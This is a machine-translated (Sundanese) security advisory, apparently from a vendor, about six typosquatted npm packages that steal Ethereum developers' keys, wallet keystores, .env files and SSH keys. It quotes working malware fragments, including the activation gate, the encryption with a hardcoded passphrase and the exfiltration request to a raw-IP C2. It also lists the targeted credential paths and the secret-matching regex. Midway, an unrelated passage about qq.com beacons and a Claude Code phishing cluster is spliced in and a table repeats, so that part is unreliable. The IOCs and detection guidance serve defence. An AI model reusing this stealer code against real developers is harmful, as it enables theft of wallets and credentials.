TL; DR
Dina tanggal 6 Méi 2026, hiji penerbit npm, namikazesarada010206, ngaluncurkeun genep paket jahat anu nargétkeun ékosistem pamekar Ethereum, Solidity, sareng DeFi.
Pakét-pakétna, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, sarta web3-utils-core, nganggo nami anu masuk akal anu dirancang supados katingalina sapertos pustaka pembantu pikeun alat Web3 anu populér.
Sadaya genep bungkus ngandung barang anu sami telemetry.js file. File éta idéntik byte di sakuliah klaster, sareng SHA-256:
Malware henteu tiasa dijalankeun nalika waktos pamasangan. Teu aya preinstall or postinstall hook. Gantina, éta bakal aktip nalika pakét diimpor ngaliwatan require().
Detil éta penting.
Implant ngantosan dugi ka pamekar leres-leres nganggo pakét éta. Teras éta mariksa naha workstation katingalina sapertos lingkungan pamekaran Ethereum / Solidity anu asli. Éta milarian konci Alchemy atanapi Infura, konci pribadi, mnemonik, konci deployer, atanapi diréktori Foundry lokal.
Upami host cocog, anu maling bakal ngumpulkeun konci pribadi SSH, toko konci dompét Foundry / Geth / Brownie, .env* file, sareng variabel lingkungan anu sénsitip. Éta ngénkripsi bungkusan nganggo AES-256-GCM nganggo frasa sandi anu di-hardcode sareng ngaluarkeunana ka titik tungtung IPv4 C2 atah kalayan verifikasi TLS dinonaktipkeun.
Sistem Peringatan Awal Malware (MEW) Xygeni mastikeun sadaya genep paket salaku paket jahat. Bundel laporan takedown pendaptaran npm nuju ngantosan prosés.
Klasterna: Genep Paket, Hiji Penerbit
Akun penerbit namikazesarada010206 geus dihubungkeun ka alamat Gmail anu teu acan diverifikasi namikazesarada010206@gmail.com.
Kampanye éta muncul salaku publikasi sadinten dina 6 Méi 2026. Sadaya genep pakét diversi salaku 1.0.0, teu boga katergantungan runtime, sarta ngan ngirimkeun tilu file:
package.json index.js telemetry.js Aranjeunna ogé nyatakeun gudang sumber anu sami:
https://github.com/harunosakura030303-maker/evmchain-config Tilu pakét anu munggaran katéwak ku pamindai MEW dina publikasi munggaran. Tilu sésana ditandaan sacara paksa saatos analis marios profil npm penerbit. Sakali byte-idéntik anu sami telemetry.js dikonfirmasi di sakuliah klaster, éta ditutup salaku jahat ku konsistensi.
| paket | Vérsi | npm Diterbitkeun | Tiket MEW | putusan |
|---|---|---|---|---|
| inti-viem | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Jahat |
| inti-viem-utils | 1.0.0 | 2026-05-06 | #51050 | Jahat |
| utils-inti-hardhat | 1.0.0 | 2026-05-06 | #51051 | Jahat |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Jahat, ku konsistensi |
| utilitas pengecoran | 1.0.0 | 2026-05-06 | #51071 | Jahat, ku konsistensi |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Jahat, ku konsistensi |
Strategi penamaan téh lugas tapi efektif.
Pakét-pakét ieu henteu nyamar jadi ngaran hulu anu pasti. Sabalikna, aranjeunna nganggo akhiran "utilitas" anu masuk akal sapertos -core, -utils, sarta -utils-coreÉta ngajantenkeun aranjeunna katingali sapertos pustaka pendamping anu diarepkeun ku pamekar caket kana alat Web3.
| Paket Jahat | Target Sah |
|---|---|
| inti-viem | viem, klien Ethereum TypeScript anu populér |
| inti-viem-utils | viem |
| utils-inti-hardhat | hardhat, lingkungan pamekaran Solidity umum |
| evm-utils | Namespace parabot EVM umum |
| utilitas pengecoran | pabrik pengecoran, ranté parabot Soliditas |
| web3-utils-core | web3-utils, panyangga Web3.js |
Ieu pola "pakét tambahan": sanés "Abdi téh pakét anu saleresna," tapi "Abdi katingalina sapertos pembantu anu wajar di sakitar pakét anu saleresna."
Pikeun pamekar DeFi anu gancang gerak, éta cekap pikeun nyiptakeun résiko.
Naon Anu Kajadian Nalika Pakét Diimpor
Ranté seranganna leutik, ngahaja, sareng museur kana lingkungan pamekaran kripto.
Teu aya gantungan pamasangan. Gantina, unggal pakét ngawengku hiji index.js anu ngékspor fungsi stub teras ngamuat modul telemetri jahat.
require('./telemetry').init(); Ieu hartina malware bakal aktip dina impor munggaran.
Éta sacara operasional mangpaat pikeun panyerang. Seueur scanner sareng sandbox museur kana paripolah waktos pamasangan. Paket ieu ngantosan dugi ka leres-leres dianggo ku pamekar, skrip build, test suite, atanapi jalur runtime.
Gerbang Aktivasina: Ngan Aktifkeun dina Workstation Pamekar Web3 Asli
Bagian anu paling penting tina implan nyaéta gerbang aktivasi.
Malware ieu mariksa variabel lingkungan anu umumna kapanggih dina mesin pamekar Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Éta ogé mariksa naha Foundry sigana parantos dipasang:
fs.existsSync(path.join(os.homedir(), '.foundry')) Upami dua-duana kaayaan henteu leres, fungsi éta bakal mulang sareng henteu ngalakukeun nanaon.
Éta ngajantenkeun pakét langkung sepi dina lingkungan analisis umum. Sandbox tanpa Foundry, konci Alchemy, konci Infura, konci pribadi, atanapi mnemonik tiasa ningali impor anu katingalina teu bahaya.
Dina host anu cocog, malware ngantosan 60 dugi ka 90 detik sateuacan dikumpulkeun:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Reureuh ieu ngirangan korélasi anu jelas antara impor sareng éksfiltrasi. .unref() panggero ogé ngamungkinkeun prosés host kaluar sacara normal upami pakét diimpor dina skrip anu umurna pondok.
Ieu sanés paripolah smash-and-grab anu ribut. Ieu mangrupikeun maling anu ditargetkeun anu dirancang pikeun nyingkahan jalan kecuali lingkungan pamekar pantes dicolong.
Naon anu dikumpulkeun ku si maling
Sakali gerbang aktivasi lulus, malware bakal ngumpulkeun tina sumber anu paling penting dina pamekaran Web3: konci pribadi, toko konci dompét, kredensial palaksanaan, rahasia awan, token npm, sareng konfigurasi proyék lokal.
| sumber | Naon Anu Dikumpulkeun |
|---|---|
| prosés.env | Variabel naon waé anu cocog sareng /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | File anu ngandung PRIVATE KEY atanapi BEGIN OPENSSH, kalebet eusi file lengkep |
| ~/.pabrik/toko konci/* | File konci dompét pengecoran |
| ~/.ethereum/toko konci/* | File konci dompét Geth |
| ~/.brownie/akun/* | File konci dompét brownie |
| ${cwd}/.env | Eusi file lengkep |
| ${cwd}/.env.local | Eusi file lengkep |
| ${cwd}/.env.produksi | Eusi file lengkep |
| ${cwd}/.env.pangembangan | Eusi file lengkep |
| os.ngaranhost() | Metadata host |
| crypto.randomUUID() | Identipikasi korban/sesi |
| Tanggal.ayeuna() | Cap waktos pangumpulan |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Token ATTA nyaéta:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Kami teu acan tiasa mastikeun naha telemetri éta mangrupikeun analitik operator nyalira atanapi saluran anu dimonetisasi sacara misah. Token ATTA sami dina dua sampel anu kami pariksa.
Klaster B: heibai
claude.hk OAuth Phishing + Pembajakan ANTHROPIC_BASE_URL
Sampel 1 April mangrupikeun bagian kampanye anu langkung kasar sareng langkung awal.
heibai:2.1.88-claude.hk-4 dipedalkeun ku wuguoqiangvip28, akun anu didamel tanggal 7 Juni 2025. Pakét éta sacara éksplisit ngarobih vérsi sorangan ngalawan anu sah 2.1.88 Pelepasan antropik.
Éta henteu ngaganggu CA-cert MITM. Sabalikna, éta bohong ka pangguna ngeunaan titik tungtung OAuth.
Tambahan jahat di luhur sumber Claude Code anu bocor kalebet:
| sumber | Naon Anu Dikumpulkeun |
|---|---|
| prosés.env | Variabel naon waé anu cocog sareng /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | File anu ngandung PRIVATE KEY atanapi BEGIN OPENSSH, kalebet eusi file lengkep |
| ~/.pabrik/toko konci/* | File konci dompét pengecoran |
| ~/.ethereum/toko konci/* | File konci dompét Geth |
| ~/.brownie/akun/* | File konci dompét brownie |
| ${cwd}/.env | Eusi file lengkep |
| ${cwd}/.env.local | Eusi file lengkep |
| ${cwd}/.env.produksi | Eusi file lengkep |
| ${cwd}/.env.pangembangan | Eusi file lengkep |
| os.ngaranhost() | Metadata host |
| crypto.randomUUID() | Identipikasi korban/sesi |
| Tanggal.ayeuna() | Cap waktos pangumpulan |
Daptar targetna spésifik pisan. Ieu sanés maling browser umum atanapi scraping kredensial anu lega. Ieu ditujukeun pikeun pamekar anu ngawangun, nguji, nyebarkeun, atanapi ngoperasikeun aplikasi Ethereum.
Kaasupna keystore Foundry, Geth, sareng Brownie téh penting pisan. File-file ieu tiasa ngawakilan aksés langsung kana dompét atanapi idéntitas palaksanaan. Upami panyerang tiasa masangkeunana sareng kecap akses, mnemonik, atanapi rahasia lingkungan, aranjeunna tiasa mindahkeun dana, nyamar janten panyebar, atanapi ngaganggu operasi kontrak cerdas.
Énkripsi Sateuacan Ékstrafiltrasi
Malware éta ngénkripsi data anu dikumpulkeun sateuacan dikirimkeun.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Kecap akses anu dikodekeun sacara teuas nyaéta:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Payload ahir dibungkus salaku JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Énkripsi teu ngajadikeun malware leuwih maju ku sorangan. Nanging, éta ngajadikeun pamariksaan jaringan leuwih hésé. Pamekar anu ningali jalan kaluar bakal ningali muatan JSON, tapi sanés konci anu dipaling, file dompét, atanapi .env eusi tanpa frasa sandi sareng logika dekripsi anu di-hardcode.
Ékfiltrasi ka IPv4 C2 Atah
Jalur éksfiltrasi dikodekeun sacara ketat:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Malware ngirim data ka:
https://76.13.37.80:8443/api/v1/telemetry Dua detil anu nonjol.
Mimitina, C2 mangrupikeun alamat IPv4 atah tinimbang domain. Éta ngaleungitkeun kabutuhan pikeun pendaptaran domain sareng nyingkahan sababaraha deteksi berbasis domain.
Kadua, verifikasi TLS dinonaktipkeun ku:
rejectUnauthorized: false Éta ngamungkinkeun malware pikeun nampi sertipikat naon waé, kalebet sertipikat anu ditandatanganan ku nyalira. Kalayan kecap sanésna, panyerang nampi transportasi énkripsi tanpa peryogi sertipikat umum anu valid.
Teu aya logika coba deui sareng teu aya host cadangan. Kasalahan ditelan sacara teu langsung. Ieu ngajaga pakét tetep jempe upami C2 offline atanapi teu tiasa dihubungi.
Naha Kampanye Ieu Penting
Kaseueuran pakét npm jahat anu ditujukeun pikeun pamekar ngudag kredensial anu lega: token npm, konci AWS, token GitHub, atanapi .npmrc payel.
Kampanye ieu ngaheureutan target.
Éta milarian tanda-tanda yén mesin éta milik pamekar Ethereum atanapi Solidity. Teras éta narik persis aset anu penting dina lingkungan éta: dompét konci, konci pribadi, mnemonik, konci deployer, .env file, sareng konci SSH.
Éta ngajantenkeun kampanye langkung bahaya pikeun tim Web3 tibatan maling npm umum.
Inféksi anu suksés tiasa ngalaan:
- Dompét palaksanaan
- Konci admin kontrak pinter
- Konci panyadia RPC
- Kredensial palaksanaan awan
- token penerbitan npm
- Aksés SSH ka infrastruktur pamekar atanapi wangunan
- Rahasia proyék disimpen dina
.envpayil - Tempat konci dompét pikeun Foundry, Geth, atanapi Brownie
Ngaran pakét ogé némbongkeun rékayasa sosial anu jelas. Éta narékahan ékosistem pamekar Web3 ngaliwatan ngaran alat anu biasa: viem, hardhat, foundry, evm, sarta web3.
Aktorna teu kedah ngorbankeun proyék anu saleresna. Aranjeunna ngan ukur peryogi pamekar pikeun masang pakét pendamping anu katingalina lumayan.
Indikator Kompromi sareng Deteksi
| Paket sareng Penerbit | |
|---|---|
| lapang | ajen |
| penerbit npm | namikazesarada010206 |
| Surélék penerbit | namikazesarada010206@gmail.com |
| Surélék diverifikasi | teu |
| SCM diverifikasi | teu |
| Skor reputasi | 1.0 |
| bungkusan | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core |
| versi | kabéh 1.0.0 |
| Gudang sumber | https://github.com/harunosakura030303-maker/evmchain-config |
| Dikonfirmasi jahat | Sadayana genep pakét |
| Network | |
|---|---|
| ngetik | ajen |
| Titik tungtung C2 | https://76.13.37.80:8443/api/v1/telemetry |
| IP C2 | 76.13.37.80 |
| Palabuhan C2 | 8443/tcp |
| Paripolah TLS | nolakTeu diidinan: palsu |
| Skéma muatan | {"v":2,"iv": ,"d": "t": } |
| File sareng Hash | |
|---|---|
| ngetik | ajen |
| telemetry.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Tata letak pakét | package.json, index.js, telemetry.js |
| Jumlah file | 3 |
| Ukuran total perkiraan | 3.4 KB |
Sinyal Aktivasina
Malware mariksa variabel lingkungan ieu:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Éta ogé mariksa:
~/.foundry/ Jalur Host anu Disasar
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex Koleksi
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Catetan Deteksi
Sababaraha aturan nangkep kampanye ieu tanpa peryogi analisis paripolah lengkep.
Mimitina, scan file konci pikeun genep nami pakét jahat:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Pertandingan naon waé dina package-lock.json, yarn.lock, pnpm-lock.yaml, atawa node_modules sajarah kudu dianggap salaku kajadian anu serius.
Kadua, pantau prosés Node.js anu maca jalur keystore wallet:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Ieu jarang janten paripolah anu sah pikeun pakét anu diimpor salaku dependensi helper. Ieu khususna curiga nalika dituturkeun ku aktivitas jaringan kaluar.
Katilu, blokir atanapi béwarakeun sambungan HTTPS ka:
76.13.37.80:8443 Utamana nalika jalur pamundut nyaéta:
/api/v1/telemetry Kaopat, milarian pakét npm anu ngagabungkeun sipat-sipat ieu:
- Penerbit anyar atanapi anu reputasina handap
- Akun Gmail anu teu acan diverifikasi
- Ngaran pakét anu padeukeut jeung Web3
- Teu aya riwayat gudang anu penting
- Tata letak pakét leutik
index.jsanu ngamuat file telemetri atanapi helper- Teu aya katergantungan runtime
- Kumpulan variabel lingkungan anu sénsitip
- Aksés toko konci dompét
Pola ieu langkung mangpaat tibatan hiji IOC sabab pakét salajengna tiasa ngarobih alamat IP tapi tetep nganggo logika targeting anu sami.
Daptar Pariksa Réspon Kompromi
Upami pamekar nganggo salah sahiji tina genep pakét sareng lingkunganana cocog sareng gerbang aktivasi, anggap workstation éta salaku anu dikompromi.
Éta kalebet mesin anu dipasang Foundry, konci Alchemy atanapi Infura dina lingkunganana, konci pribadi, mnemonik, atanapi konci deployer.
Réspon anu disarankeun:
- Pegatkeun sambungan host tina jaringan.
- Ngawétkeun
node_modules, file konci, riwayat cangkang, sareng log anu relevan pikeun forensik. - Puterkeun unggal pasangan konci SSH di handap
~/.ssh/. - Rotasikeun konci dompét pikeun unggal gudang konci di handap
~/.foundry,~/.ethereum, sarta~/.brownie. - Pindahkeun dana ka dompét anyar.
- Muterkeun unggal rusiah anu disimpen dina
.env*file dina gudang tempat pamekar damel. - Rotasikeun rusiah lingkungan anu cocog sareng regex koleksi, kalebet konci AWS, token npm, token deploy, konci API, konci pribadi, siki, sareng mnemonik.
- Aktivitas audit cloud, npm, GitHub, panyadia RPC, sareng blockchain saprak pakét mimiti dipasang.
- Gambarkeun deui workstation sateuacan dianggo deui.
Naon Anu Kudu Dicandak ku Para Pembela
Kampanye ieu nunjukkeun kumaha typosquatting npm mekar di sabudeureun ékosistem pamekar anu bernilai tinggi.
Aktorna teu butuh kegigihan. Maranéhna teu butuh pangacakan. Maranéhna malah teu butuh palaksanaan waktu pamasangan.
Gantina, aranjeunna ngandelkeun tilu hal:
- Ngaran pakét Web3 anu masuk akal
- Aktivasina ngan ukur dina mesin pamekaran kripto nyata
- Maling langsung file sareng rahasia anu paling penting pikeun pamekar Ethereum
Éta ngajantenkeun kampanye gampang sono dina pamindaian anu lega sareng bahaya nalika badarat di lingkungan anu pas.
Pikeun tim Web3, palajaranana jelas: anggap nami katergantungan salaku bagian tina modél ancaman anjeun. Pakét anu katingalina sapertos pembantu anu teu bahaya masih tiasa janten jalur pangpondokna pikeun kompromi dompét.
Dilaporkeun ka pendaptaran npm. Kami bakal ngapdet postingan ieu nalika akun penerbit sareng pakét dihapus.




